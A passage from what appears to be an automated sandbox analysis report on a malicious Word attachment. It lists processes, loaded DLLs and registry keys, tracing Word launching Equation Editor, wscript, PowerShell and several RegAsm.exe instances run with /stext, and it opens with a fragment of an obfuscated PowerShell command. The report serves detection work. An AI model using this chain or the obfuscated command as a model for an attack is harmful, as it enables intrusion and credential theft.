{2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Scan Order and Specification 01-10- 2024.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Scan Order and Specification 01-10- 2024.docx
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/media/image4.emf
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/media/image3.emf
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/media/image2.emf
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
